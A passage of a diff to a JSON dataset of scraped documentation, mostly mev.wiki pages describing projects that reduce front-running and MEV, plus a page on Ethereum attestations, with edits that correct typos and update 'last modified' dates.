Private Transactions offered by Taichi Network bloXroute Labs has a wide range of offerings and their core competency is low global latency for DeFi (8% of blocks mined within 1 sec). For the other side of the coin, here is bloXroute Labs' take on why private mempools are not necessarily bad : 1. Front-runners don't need these services to outpace regular users, who are slower by seconds. They need it to outpace one another, where improving speed 0.8->0.15 sec matters. 2. When a transaction is privately sent to pools other frontrunners can't attempt to front-run it. This helps avoid fierce escalation of fees. Link: https://docs.bloxroute.com/apis/frontrunning-protection Previous Front-running as a Service (FaaS) or MEV Auctions (MEVA) Next BackRunMe by bloXroute Last modified 2yr ago", "labels": [ "Documentation" ] @@ -738,7 +738,7 @@ { "title": "Arbitrum (Offchain Labs)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/arbitrum-offchain-labs", - "body": "Arbitrum (Offchain Labs) Arbitrum by Offchain Labs Arbitrum is against MEVA and FaaS. 3 Modes of Arbitrum: 1. Single Sequencer: L2 MEV-Potential ( Mainnet Beta ) For Arbitrums initial, flagship Mainnet beta release, the Sequencer will be controlled by a single entity. This entity has transaction ordering rights within the narrow / 15 minute window; users are trusting the Sequencer not to frontrun them. 2. Distributed Sequencer With Fair Ordering: L2-MEV-minimized ( Mainnet Final Form ) The Arbitrum flagship chain will eventually have a distributed set of independent parties controlling the Sequencer. They will collectively propose state updates via the first BFT algorithm that enforces fair ordering within consensus (Aequitas) . Here, L2 MEV is only possible if >1/3 of the sequencing-parties maliciously collude, hence MEV-minimized. 3. No Sequencer: No L2 MEV A chain can be created in which no permissioned entities have Sequencing rights. Ordering is determined entirely by the Inbox contract; lose the ability to get lower latency than L1, but gain is that no party involved in L2, including Arbitrum validators, has any say in transaction ordering, and thus no L2 MEV enters the picture. Links: Website: https://offchainlabs.com/ Medium: https://medium.com/offchainlabs/front-running-as-a-service-334c929c945 Document: https://docs.google.com/document/d/1VOACGgTR84XWm5lH5Bki2nBcImi3lVRe2tYxf5F6XbA/edit Previous Fair sequencing service (Chainlink) Next Vega protocol Last modified 1yr ago", + "body": "Arbitrum (Offchain Labs) Arbitrum by Offchain Labs Arbitrum is against MEVA and FaaS. 3 Modes of Arbitrum: 1. Single Sequencer: L2 MEV-Potential ( Mainnet Beta ) For Arbitrums initial, flagship Mainnet beta release, the Sequencer will be controlled by a single entity. This entity has transaction ordering rights within the narrow / 15 minute window; users are trusting the Sequencer not to frontrun them. 2. Distributed Sequencer With Fair Ordering: L2-MEV-minimized ( Mainnet Final Form ) The Arbitrum flagship chain will eventually have a distributed set of independent parties controlling the Sequencer. They will collectively propose state updates via the first BFT algorithm that enforces fair ordering within consensus (Aequitas) . Here, L2 MEV is only possible if >1/3 of the sequencing-parties maliciously collude, hence MEV-minimized. 3. No Sequencer: No L2 MEV A chain can be created in which no permissioned entities have Sequencing rights. 
Ordering is determined entirely by the Inbox contract; you lose the ability to get lower latency than L1, but the gain is that no party involved in L2, including Arbitrum validators, has any say in transaction ordering, and thus no L2 MEV enters the picture. Links: Website: https://offchainlabs.com/ Medium: https://medium.com/offchainlabs/front-running-as-a-service-334c929c945 Document: https://docs.google.com/document/d/1VOACGgTR84XWm5lH5Bki2nBcImi3lVRe2tYxf5F6XbA/edit Previous Fair sequencing service (Chainlink) Next Vega protocol Last modified 2yr ago", "labels": [ "Documentation" ] @@ -746,7 +746,7 @@ { "title": "Conveyor (Automata Network)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/conveyor-automata-network", - "body": "Conveyor (Automata Network) Conveyor - The Automata Network approach to tackling MEV At Automata, we have created Conveyor , a service that ingests and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. When transactions are fed into Conveyor, it determines the order of the incoming transactions and makes it impossible for block producers to perform the following: 1. Inject new transactions into the Conveyor output: The inserted transactions bypassing Conveyor is detectable by anyone because of signature mismatch. 2. Delete ordered transactions: Transactions accepted by Conveyor are broadcasted everywhere so transactions cannot be deleted unless ALL block producers are colluding and censoring the transactions at the same time. From the DEXs perspective, they can choose to accept either 1. Ordered transactions from Automatas Conveyor which is free from transaction reordering and other front-running transactions 2. Other unordered transactions (which include front-running etc) that may negatively impact their users Why should users trust Conveyor? Automatas Conveyor runs on a decentralized compute plane backed by many Geode instances. Each Geode instance can be attested so anyone can publicly verify that the Geode is running on a system with genuine hardware (i.e., CPU) and that the Geode application code matches the version that is open-sourced and audited. This provides a strong guarantee that: The Geode code is untampered with The Geode data is inaccessible to even Geode providers (In which case they cannot act on said data to front-run transactions) Importantly, Automatas Conveyor is a chain-agnostic solution to the MEV issue, and works seamlessly on various platforms zero modifications needed. An industry-first: Oblivious RAM In fully public computation, access pattern leakage is not negligible as everything is exposed. But in privacy-preserving computation, any tiny bit of information leakage becomes a significant issue. Studies have shown that access pattern leakage leads to exposure of sensitive information such as private keys from searchable encryption and trusted computing. This is where the Oblivious RAM algorithm comes into play. Automatas implementation is the first-of-its-kind in the blockchain industry, providing an exceedingly high degree of privacy in dApps. This greatly reduces the probability of user privacy being leaked even as access patterns are being monitored and analyzed by malicious actors. The Automata team has authored multiple research papers on state-of-the-art ORAM and hardware technologies to enhance the privacy and performance of existing networks.
Robust P2P Primitives Using SGX Enclaves RAID 2020 PRO-ORAM: Practical Read-Only Oblivious RAM RAID 2019 OblivP2P: An Oblivious Peer-to-Peer Content Sharing System USENIX Security 2016 Preventing Page Faults from Telling Your Secrets Asia CCS 2016 Official Links Website: https://ata.network/ Whitepaper: https://xata.to/lightpaper GitHub: https://xata.to/github Documentation: https://docs.ata.network/ Ambassador program form: https://xata.to/ambassadors FAQ: https://xata.to/faq Official Socials Telegram Annoucement Channel: https://t.me/ata_announcement Telegram Chat Group: https://xata.to/telegram Twitter: https://xata.to/twitter Discord: https://xata.to/discord Medium: https://xata.to/medium Community Links Korea (Telegram): https://t.me/atanetworkkorea Spain (Telegram): https://t.me/atanetworkspanish Sri Lanka (Telegram): https://t.me/atanetworksinhala Russian (Telegram): https://t.me/atanetworkrussia Malay-Indonesian (Telegram): https://t.me/atanetworkmalaysia Other useful links MEV Checkup Tool: https://mev.tax/ Coinmarketcap article: https://xata.to/vxa Binance research report: https://xata.to/br Binance launchpool annoucement: https://xata.to/186e34 Previous MEV Minimization Next SecretSwap (Secret Network) Last modified 1yr ago", + "body": "Conveyor (Automata Network) Conveyor - The Automata Network approach to tackling MEV At Automata, we have created Conveyor , a service that ingests and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. When transactions are fed into Conveyor, it determines the order of the incoming transactions and makes it impossible for block producers to perform the following: 1. Inject new transactions into the Conveyor output: The inserted transactions bypassing Conveyor is detectable by anyone because of signature mismatch. 2. Delete ordered transactions: Transactions accepted by Conveyor are broadcasted everywhere so transactions cannot be deleted unless ALL block producers are colluding and censoring the transactions at the same time. From the DEX's perspective, they can choose to accept either 1. Ordered transactions from Automata's Conveyor which is free from transaction reordering and other front-running transactions 2. Other unordered transactions (which include front-running etc) that may negatively impact their users Why should users trust Conveyor? Automata's Conveyor runs on a decentralized compute plane backed by many Geode instances. Each Geode instance can be attested so anyone can publicly verify that the Geode is running on a system with genuine hardware (i.e., CPU) and that the Geode application code matches the version that is open-sourced and audited. This provides a strong guarantee that: The Geode code is untampered with The Geode data is inaccessible to even Geode providers (In which case they cannot act on said data to front-run transactions) Importantly, Automata's Conveyor is a chain-agnostic solution to the MEV issue, and works seamlessly on various platforms, zero modifications needed. An industry-first: Oblivious RAM In fully public computation, access pattern leakage is not negligible as everything is exposed. But in privacy-preserving computation, any tiny bit of information leakage becomes a significant issue. Studies have shown that access pattern leakage leads to exposure of sensitive information such as private keys from searchable encryption and trusted computing. This is where the Oblivious RAM algorithm comes into play.
Automata's implementation is the first-of-its-kind in the blockchain industry, providing an exceedingly high degree of privacy in dApps. This greatly reduces the probability of user privacy being leaked even as access patterns are being monitored and analyzed by malicious actors. The Automata team has authored multiple research papers on state-of-the-art ORAM and hardware technologies to enhance the privacy and performance of existing networks. Robust P2P Primitives Using SGX Enclaves RAID 2020 PRO-ORAM: Practical Read-Only Oblivious RAM RAID 2019 OblivP2P: An Oblivious Peer-to-Peer Content Sharing System USENIX Security 2016 Preventing Page Faults from Telling Your Secrets Asia CCS 2016 Official Links Website: https://ata.network/ Whitepaper: https://xata.to/lightpaper GitHub: https://xata.to/github Documentation: https://docs.ata.network/ Ambassador program form: https://xata.to/ambassadors FAQ: https://xata.to/faq Official Socials Telegram Announcement Channel: https://t.me/ata_announcement Telegram Chat Group: https://xata.to/telegram Twitter: https://xata.to/twitter Discord: https://xata.to/discord Medium: https://xata.to/medium Community Links Korea (Telegram): https://t.me/atanetworkkorea Spain (Telegram): https://t.me/atanetworkspanish Sri Lanka (Telegram): https://t.me/atanetworksinhala Russian (Telegram): https://t.me/atanetworkrussia Malay-Indonesian (Telegram): https://t.me/atanetworkmalaysia Other useful links MEV Checkup Tool: https://mev.tax/ Coinmarketcap article: https://xata.to/vxa Binance research report: https://xata.to/br Binance launchpool announcement: https://xata.to/186e34 Previous MEV Minimization Next SecretSwap (Secret Network) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -754,7 +754,7 @@ { "title": "CowSwap", "html_url": "https://www.mev.wiki/solutions/mev-minimization/cowswap", - "body": "CowSwap CowSwap A collaboration between BalancerLabs and Gnosis, CowSwap is a DEX that leverages batch auctions to provide MEV protection, plus integrate with liquidity sources across DEXs to offer traders the best prices. When two traders each hold an asset the other wants, an order can be settled directly between them without an external market maker or liquidity provider. Any excess is settled in the same transaction with the best available AMM. The transaction is sent by professional solvers which set tight slippage bounds. Solvers compete with each other to achieve best prices for the user. Links: Website: https://cowswap.exchange/#/swap Blog: https://blog.gnosis.pm/introducing-gnosis-protocol-v2-and-balancer-gnosis-protocol-f693b2938ae4 Previous Vega protocol Next Veedo (StarkWare) Last modified 1yr ago", + "body": "CowSwap CowSwap A collaboration between BalancerLabs and Gnosis, CowSwap is a DEX that leverages batch auctions to provide MEV protection, and integrates with liquidity sources across DEXs to offer traders the best prices. When two traders each hold an asset the other wants, an order can be settled directly between them without an external market maker or liquidity provider. Any excess is settled in the same transaction with the best available AMM. The transaction is sent by professional solvers which set tight slippage bounds. Solvers compete with each other to achieve best prices for the user.
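The coincidence-of-wants settlement the CowSwap entry describes can be illustrated with a toy matcher. The Order shape, the clearing price, and the amounts below are invented for the example; real solvers derive clearing prices in a competitive batch auction.

```python
# Toy sketch of the "coincidence of wants" settlement described in the
# CowSwap entry above: two opposing orders settle against each other
# directly, and only the unmatched excess would be routed to an AMM.
# Order fields, the clearing price, and the amounts are hypothetical.

from dataclasses import dataclass

@dataclass
class Order:
    trader: str
    sell_token: str
    buy_token: str
    sell_amount: float

def match_cow(a: Order, b: Order, price: float):
    """Settle two opposing orders at `price` (b.sell_token per a.sell_token).
    Returns (matched a-side amount, matched b-side amount, a's unmatched excess)."""
    assert (a.sell_token, a.buy_token) == (b.buy_token, b.sell_token)
    x = min(a.sell_amount, b.sell_amount / price)  # a.sell_token actually swapped
    return x, x * price, a.sell_amount - x

alice = Order("alice", "ETH", "DAI", 10.0)
bob = Order("bob", "DAI", "ETH", 25_000.0)
x, y, excess = match_cow(alice, bob, price=2_000.0)
print(x, y, excess)  # 10 ETH matched against 20,000 DAI; Alice fully filled
```

Because the matched legs never touch an on-chain pool, there is no public swap for a sandwich bot to front-run; only Bob's remaining 5,000 DAI of unmatched volume would be settled against the best available AMM.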
Links: Website: https://cowswap.exchange/#/swap Blog: https://blog.gnosis.pm/introducing-gnosis-protocol-v2-and-balancer-gnosis-protocol-f693b2938ae4 Previous Vega protocol Next Veedo (StarkWare) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -762,7 +762,7 @@ { "title": "Fair sequencing service (Chainlink)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/fair-sequencing-service-chainlink", - "body": "Fair sequencing service (Chainlink) The Fair Sequencing Service by ChainLink The idea behind FSS is to have an oracle network order the transactions sent to a particular contract SC, including both user transactions and oracle reports. Oracle nodes ingest transactions and then reach consensus on their ordering, rather than allowing a single leader to dictate it. FSS is a framework for implementing ordering policies, of which Aequitas (protocol for order-fairness in addition to consistency and liveness) is one example. It can alternatively support simpler approaches, such as straightforward encryption of transactions, which can then be decrypted in a threshold manner by oracle nodes after ordering. It will also support various policies for inserting oracle reports into a stream of transactions. (It can even support MEV auctions, if desired.) Links: Blog post: https://blog.chain.link/chainlink-fair-sequencing-services-enabling-a-provably-fair-defi-ecosystem/ Whitepaper (to be released later) Previous SecretSwap (Secret Network) Next Arbitrum (Offchain Labs) Last modified 1yr ago", + "body": "Fair sequencing service (Chainlink) The Fair Sequencing Service by ChainLink The idea behind FSS is to have an oracle network order the transactions sent to a particular contract SC, including both user transactions and oracle reports. Oracle nodes ingest transactions and then reach consensus on their ordering, rather than allowing a single leader to dictate it. FSS is a framework for implementing ordering policies, of which Aequitas (protocol for order-fairness in addition to consistency and liveness) is one example. It can alternatively support simpler approaches, such as straightforward encryption of transactions, which can then be decrypted in a threshold manner by oracle nodes after ordering. It will also support various policies for inserting oracle reports into a stream of transactions. (It can even support MEV auctions, if desired.) Links: Blog post: https://blog.chain.link/chainlink-fair-sequencing-services-enabling-a-provably-fair-defi-ecosystem/ Whitepaper (to be released later) Previous SecretSwap (Secret Network) Next Arbitrum (Offchain Labs) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -770,7 +770,7 @@ { "title": "LibSubmarine", "html_url": "https://www.mev.wiki/solutions/mev-minimization/libsubmarine", - "body": "LibSubmarine LibSubmarine LibSubmarine is an open-source smart contract library that protects your contract against front-runners by temporarily hiding transactions on-chain. Links: Website: https://libsubmarine.org/ Video: https://www.youtube.com/watch?v=N8PDKoptmPs&feature=emb_imp_woyt&ab_channel=IC3InitiativeforCryptocurrenciesandContracts GitHub: https://github.com/lorenzb/libsubmarine Previous Veedo (StarkWare) Next Sikka Last modified 1yr ago", + "body": "LibSubmarine LibSubmarine LibSubmarine is an open-source smart contract library that protects your contract against front-runners by temporarily hiding transactions on-chain. 
Links: Website: https://libsubmarine.org/ Video: https://www.youtube.com/watch?v=N8PDKoptmPs&feature=emb_imp_woyt&ab_channel=IC3InitiativeforCryptocurrenciesandContracts GitHub: https://github.com/lorenzb/libsubmarine Previous Veedo (StarkWare) Next Sikka Last modified 2yr ago", "labels": [ "Documentation" ] @@ -778,7 +778,7 @@ { "title": "SecretSwap (Secret Network)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/secretswap-secret-network", - "body": "SecretSwap (Secret Network) Secret Swap Secret Swap is an automated market maker (AMM) liquidity protocol. There is no orderbook, no centralized party, and no central facilitator of trade. Using Secret Contracts, the mempool of potential Secret Swap transactions are kept entirely encrypted - protecting users from MEV, front-running attacks and providing an increased level of privacy compared to traditional AMMs. The protocol uses swap secret contract based tokens (SNIP-20s) on Secret Network. Given the encrypted nature of SNIP-20s secret contracts, inputs to a transaction/contract are encrypted while they are on the mempool and cannot be front-run by any adversary. Users will have to pay for gas and 0.3% swap fees with the $SCRT token to use Secret Swap. Links: Website: https://www.secretswap.io Analytics: http://secretanalytics.xyz Documentation: https://docs.secretswap.io/secretswap Previous Conveyor (Automata Network) Next Fair sequencing service (Chainlink) Last modified 1yr ago", + "body": "SecretSwap (Secret Network) Secret Swap Secret Swap is an automated market maker (AMM) liquidity protocol. There is no orderbook, no centralized party, and no central facilitator of trade. Using Secret Contracts, the mempool of potential Secret Swap transactions are kept entirely encrypted - protecting users from MEV, front-running attacks and providing an increased level of privacy compared to traditional AMMs. The protocol uses swap secret contract based tokens (SNIP-20s) on Secret Network. Given the encrypted nature of SNIP-20s secret contracts, inputs to a transaction/contract are encrypted while they are on the mempool and cannot be front-run by any adversary. Users will have to pay for gas and 0.3% swap fees with the $SCRT token to use Secret Swap. Links: Website: https://www.secretswap.io Analytics: http://secretanalytics.xyz Documentation: https://docs.secretswap.io/secretswap Previous Conveyor (Automata Network) Next Fair sequencing service (Chainlink) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -786,7 +786,7 @@ { "title": "Shutter Network", "html_url": "https://www.mev.wiki/solutions/mev-minimization/shutter-network", - "body": "Shutter Network Shutter Network Shutter Network is an open-source project that aims to prevent frontrunning and malicious MEV on Ethereum by using a threshold cryptography-based distributed key generation (DKG) protocol. A Shutter transaction is a transaction protected from frontrunning in the target smart contract system. It therefore passes through a sequence of stages before it is executed. A Shutter transaction flow: 1. Created and encrypted in the user's wallet; 2. Sent to the batcher contract as a standard Ethereum transaction; 3. Picked up and decrypted by the keypers; 4. Sent to the executor contract, and 5. Forwarded to the target contract. 
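The five-stage Shutter flow listed above can be made concrete with a short simulation. The threshold DKG among keypers is abstracted to a single epoch key that stands in for the key the keypers would jointly generate and later release; the cipher is a toy one-time pad, and none of the names below correspond to Shutter's actual API.

```python
# Conceptual walk-through of the Shutter transaction flow described above.
# The keypers' threshold key generation is abstracted away: one epoch key
# stands in for the key they would jointly produce and later release.
# Everything here is illustrative, not Shutter's real interface.

import secrets

def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(d ^ k for d, k in zip(data, key))

# 1. Created and encrypted in the user's wallet (toy one-time-pad cipher).
epoch_key = secrets.token_bytes(64)        # stand-in for the keypers' joint key
tx = b"swap 10 ETH for DAI on some DEX"
ciphertext = xor_bytes(tx.ljust(64, b"\0"), epoch_key)

# 2. Sent to the batcher contract: the public mempool only ever sees
#    ciphertext, so front-runners cannot read or react to the payload.
batch = [ciphertext]

# 3./4. Once the batch is fixed, keypers release the epoch key and the
#       executor decrypts, then (5.) forwards the calls to the target contract.
for ct in batch:
    print(xor_bytes(ct, epoch_key).rstrip(b"\0"))
```

The ordering-then-decryption sequence is the point: by the time the plaintext exists, the transaction's position in the batch can no longer be changed.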
Links: Website: https://shutter.ghost.io/ GitHub: https://github.com/brainbot-com/shutter Previous Sikka Next Other solutions Last modified 1yr ago", + "body": "Shutter Network Shutter Network Shutter Network is an open-source project that aims to prevent frontrunning and malicious MEV on Ethereum by using a threshold cryptography-based distributed key generation (DKG) protocol. A Shutter transaction is a transaction protected from frontrunning in the target smart contract system. It therefore passes through a sequence of stages before it is executed. A Shutter transaction flow: 1. Created and encrypted in the user's wallet; 2. Sent to the batcher contract as a standard Ethereum transaction; 3. Picked up and decrypted by the keypers; 4. Sent to the executor contract, and 5. Forwarded to the target contract. Links: Website: https://shutter.ghost.io/ GitHub: https://github.com/brainbot-com/shutter Previous Sikka Next Other solutions Last modified 2yr ago", "labels": [ "Documentation" ] @@ -794,7 +794,7 @@ { "title": "Sikka", "html_url": "https://www.mev.wiki/solutions/mev-minimization/sikka", - "body": "Sikka Sikka Sikka's MEV solution to censorship and frontrunning problems is using a technique called Threshold Decryption, as a plugin to the Tendermint Core BFT consensus engine to create mempool level privacy. With this plugin, users are able to submit encrypted transactions to the blockchain, which are only decrypted and executed after being committed to a block by a quorum of 2/3 validators. Links: Website: https://sikka.tech/ Presentation: https://docs.google.com/presentation/d/1tQEUpZjy_U9J-VQAx1Wf5W9oOX5rrCY3AwjAb7ZgA68/edit#slide=id.p Previous LibSubmarine Next Shutter Network Last modified 1yr ago", + "body": "Sikka Sikka Sikka's MEV solution to censorship and frontrunning problems is using a technique called Threshold Decryption, as a plugin to the Tendermint Core BFT consensus engine to create mempool level privacy. With this plugin, users are able to submit encrypted transactions to the blockchain, which are only decrypted and executed after being committed to a block by a quorum of 2/3 validators. Links: Website: https://sikka.tech/ Presentation: https://docs.google.com/presentation/d/1tQEUpZjy_U9J-VQAx1Wf5W9oOX5rrCY3AwjAb7ZgA68/edit#slide=id.p Previous LibSubmarine Next Shutter Network Last modified 2yr ago", "labels": [ "Documentation" ] @@ -802,7 +802,7 @@ { "title": "Veedo (StarkWare)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/veedo-starkware", - "body": "Veedo (StarkWare) Veedo by StarkWare VeeDo is StarkWares STARK-based Verifiable Delay Function (VDF), and its PoC is now live on Mainnet. VeeDo's time-locks allow information to be sealed for a predetermined period of time (during the sequencing phase), and then made public. 2 approaches using privacy to minimize MEV 1. Time-locks as part of the protocol layer 2. Time-locks on Ethereum with smart contracts - supported today Links: Website: https://starkware.co/ Medium: https://medium.com/starkware/presenting-veedo-e4bbff77c7ae Presentation: https://docs.google.com/presentation/d/1C_Rb_rtUXT2Nkettu_GPSlD9yCge8ioBNLRj5OBNbyY/edit#slide=id.gb576f94980_0_836 Previous CowSwap Next LibSubmarine Last modified 1yr ago", + "body": "Veedo (StarkWare) Veedo by StarkWare VeeDo is StarkWares STARK-based Verifiable Delay Function (VDF), and its PoC is now live on Mainnet. VeeDo's time-locks allow information to be sealed for a predetermined period of time (during the sequencing phase), and then made public. 
2 approaches using privacy to minimize MEV 1. Time-locks as part of the protocol layer 2. Time-locks on Ethereum with smart contracts - supported today Links: Website: https://starkware.co/ Medium: https://medium.com/starkware/presenting-veedo-e4bbff77c7ae Presentation: https://docs.google.com/presentation/d/1C_Rb_rtUXT2Nkettu_GPSlD9yCge8ioBNLRj5OBNbyY/edit#slide=id.gb576f94980_0_836 Previous CowSwap Next LibSubmarine Last modified 2yr ago", "labels": [ "Documentation" ] @@ -810,7 +810,7 @@ { "title": "Vega protocol", "html_url": "https://www.mev.wiki/solutions/mev-minimization/vega-protocol", - "body": "Vega protocol Vega Protocol Traditionally, fairness in a blockchain has been defined in absolute terms, i.e. once a transaction is seen by a sufficient number of validators, it will be executed in some block, soon. Vega's proposal is to add a module to blockchains that supports the concept of relative fairness so that competing transactions may be sequenced under a known and understood protocol, and not subject to a validators discretion. \" If there is a time t such that all honest validators saw a before t and b after t, then a must be scheduled before b. This is a property that can be assured of at any time with a minimal impact on performance. To get the best combination, their current approach is a hybrid of the two. In normal operation, the protocol will assure block fairness. If the network detects that this causes a bottleneck, it temporarily switches to the timed approach (thus sacrificing a little fairness for performance), before switching back once the bottleneck is resolved. However, Vega will ultimately make the level of fairness customisable by market. Links: Website: https://vega.xyz/ Blog: https://blog.vega.xyz/new-paper-fairness-and-front-running-an-invitation-for-feedback-cbb39a1a3eb Wendy, the Good Little Fairness Widget: https://vega.xyz/papers/fairness.pdf Video: https://www.youtube.com/watch?v=KjfLj5fhkGQ&t=18s&ab_channel=VegaProtocol Previous Arbitrum (Offchain Labs) Next CowSwap Last modified 1yr ago", + "body": "Vega protocol Vega Protocol Traditionally, fairness in a blockchain has been defined in absolute terms, i.e. once a transaction is seen by a sufficient number of validators, it will be executed in some block, soon. Vega's proposal is to add a module to blockchains that supports the concept of relative fairness so that competing transactions may be sequenced under a known and understood protocol, and not subject to a validator's discretion. \"If there is a time t such that all honest validators saw a before t and b after t, then a must be scheduled before b.\" This is a property that can be assured of at any time with a minimal impact on performance. To get the best combination, their current approach is a hybrid of the two. In normal operation, the protocol will assure block fairness. If the network detects that this causes a bottleneck, it temporarily switches to the timed approach (thus sacrificing a little fairness for performance), before switching back once the bottleneck is resolved. However, Vega will ultimately make the level of fairness customisable by market.
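The ordering property quoted in the Vega entry is precise enough to check mechanically: a separating time t exists exactly when every honest validator's observation of a precedes every observation of b. Below is a small checker; the observation times and schedules are made-up inputs for illustration.

```python
# Checker for the relative-fairness property quoted in the Vega entry:
# if every honest validator saw a before some time t and b after t, then
# a must be scheduled before b. Observations and schedules are examples.

def violates_fairness(seen, schedule):
    """seen[tx] = times at which each honest validator observed tx.
    Returns (a, b) if b is scheduled before a even though a separating
    time t exists (i.e. max(seen[a]) < min(seen[b])), else None."""
    position = {tx: i for i, tx in enumerate(schedule)}
    for a in seen:
        for b in seen:
            if a != b and max(seen[a]) < min(seen[b]) and position[a] > position[b]:
                return (a, b)
    return None

seen = {"a": [1.0, 1.2, 1.1], "b": [2.0, 2.3, 2.1]}  # all saw a before t=1.5, b after
print(violates_fairness(seen, ["b", "a"]))            # ('a', 'b') -> unfair schedule
print(violates_fairness(seen, ["a", "b"]))            # None -> fair
```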
Links: Website: https://vega.xyz/ Blog: https://blog.vega.xyz/new-paper-fairness-and-front-running-an-invitation-for-feedback-cbb39a1a3eb Wendy, the Good Little Fairness Widget: https://vega.xyz/papers/fairness.pdf Video: https://www.youtube.com/watch?v=KjfLj5fhkGQ&t=18s&ab_channel=VegaProtocol Previous Arbitrum (Offchain Labs) Next CowSwap Last modified 2yr ago", "labels": [ "Documentation" ] @@ -818,7 +818,7 @@ { "title": "B.Protocol", "html_url": "https://www.mev.wiki/solutions/others/b.protocol", - "body": "B.Protocol B.Protocol B.Protocol aims to shift MEV to users. Users interact with existing lending platforms via B.Protocol smart contract. Liquidity providers (LP) provide a cushion to user debt, which gives B.Protocol precedence over other liquidators. LPs share their profits with the users, where user reward is proportional to his user rating. Links: Website: https://www.bprotocol.org/ Presentation: https://docs.google.com/presentation/d/13UNysGCX9ZJG20lKaxr_qbhgKwcuHACdwlhGNKtzGt4/edit Previous Other solutions Next Miscellaneous Last modified 1yr ago", + "body": "B.Protocol B.Protocol B.Protocol aims to shift MEV to users. Users interact with existing lending platforms via B.Protocol smart contract. Liquidity providers (LP) provide a cushion to user debt, which gives B.Protocol precedence over other liquidators. LPs share their profits with the users, where user reward is proportional to his user rating. Links: Website: https://www.bprotocol.org/ Presentation: https://docs.google.com/presentation/d/13UNysGCX9ZJG20lKaxr_qbhgKwcuHACdwlhGNKtzGt4/edit Previous Other solutions Next Miscellaneous Last modified 2yr ago", "labels": [ "Documentation" ] @@ -834,7 +834,7 @@ { "title": "Attestation", "html_url": "https://kb.beaconcha.in/attestation", - "body": "Attestation An overview of attestations Attestation Every Epoch (~6.4 minutes) a validator proposes an attestation (vote) to the network. This vote consists of the following segments: Committee Validator Index Finality vote Signature Chain head vote (vote on what the validator believes is the head of the chain) A minimum of 16,384 validators is required to start Ethereum 2.0. If we multiply that with the information included in each Attestation per Epoch, it adds up quickly. Therefore, Ethereum 2.0 aggregates all of that information and minimises the data growth. Aggregated Attestation An aggregation is a collection, or the gathering of things together. Your baseball card collection might represent the aggregation of lots of different types of cards. So what does that mean for Attestations? Each block one or more committees are chosen to attest. A committee has a minimum of 128 validators, of which 16 are randomly selected to become an aggregator. As shown below, the validators broadcast their unaggregated attestation to the aggregators (red arrow). The aggregators then merge the attestations and forward a single aggregated attestation to the block proposer . Attestation Inclusion Lifecycle 1. Generation 2. Propagation 3. Aggregation 4. Propagation 5. Inclusion Rewards The attestation reward is dependent on two variables, the base reward and the inclusion delay. The best case for the inclusion delay is to be 1. Source: ConsenSys Codefi Analysis Base reward ( Validator effective balance * 2**6 ) / SQRT( Effective balance of all active validators ) Inclusion delay At the time when the validators voted on the head of the chain (Block 0), Block 1 was not proposed yet. 
Therefore attestations naturally get included one block later; so all attestations who voted on Block 0 being the chain head got included in Block 1 and, the inclusion delay is 1. The effects of the inclusion delay on the attestation reward As shown below, an Inclusion delay of 2 causes the the reward to drop by 50%. Source: Consensys A ttestation scenarios Missing Voting Validator These validators have a maximum of 1 epoch to submit their attestation. If the attestation was missed in epoch 0, they can submit it with an inclusion delay in epoch 1. Missing Aggregator There are 16 Aggregators per epoch in total, additionally, random validators from the beacon-chain subscribe to two subnets for 256 Epochs and serve as a backup in case aggregators are missing. Missing block proposer Note that in some cases a lucky aggregator may also become the block proposer. If the attestation was not included because the block proposer has gone missing, the next block proposer would pick the aggregated attestation up and include it into the next block. However, the inclusion delay will increase by one. Credits Attestation effectiveness - AttestantIO Attestation Inclusion - Adrian Sutton (Consensys) Previous Deposit Process Next Rewards and Penalties Last modified 2yr ago", + "body": "Attestation An overview of attestations Attestation Every Epoch (~6.4 minutes) a validator proposes an attestation (vote) to the network. This vote consists of the following segments: Committee Validator Index Finality vote Signature Chain head vote (vote on what the validator believes is the head of the chain) A minimum of 16,384 validators is required to start Ethereum 2.0. If we multiply that with the information included in each Attestation per Epoch, it adds up quickly. Therefore, Ethereum 2.0 aggregates all of that information and minimises the data growth. Aggregated Attestation An aggregation is a collection, or the gathering of things together. Your baseball card collection might represent the aggregation of lots of different types of cards. So what does that mean for Attestations? Each block, one or more committees are chosen to attest. A committee has a minimum of 128 validators, of which 16 are randomly selected to become an aggregator. As shown below, the validators broadcast their unaggregated attestation to the aggregators (red arrow). The aggregators then merge the attestations and forward a single aggregated attestation to the block proposer . Attestation Inclusion Lifecycle 1. Generation 2. Propagation 3. Aggregation 4. Propagation 5. Inclusion Rewards The attestation reward is dependent on two variables, the base reward and the inclusion delay. The best case for the inclusion delay is to be 1. Source: ConsenSys Codefi Analysis Base reward ( Validator effective balance * 2**6 ) / SQRT( Effective balance of all active validators ) Inclusion delay At the time when the validators voted on the head of the chain (Block 0), Block 1 was not proposed yet. Therefore attestations naturally get included one block later; so all attestations that voted on Block 0 being the chain head got included in Block 1, and the inclusion delay is 1. The effects of the inclusion delay on the attestation reward As shown below, an Inclusion delay of 2 causes the reward to drop by 50%. Source: Consensys Attestation scenarios Missing Voting Validator These validators have a maximum of 1 epoch to submit their attestation. If the attestation was missed in epoch 0, they can submit it with an inclusion delay in epoch 1.
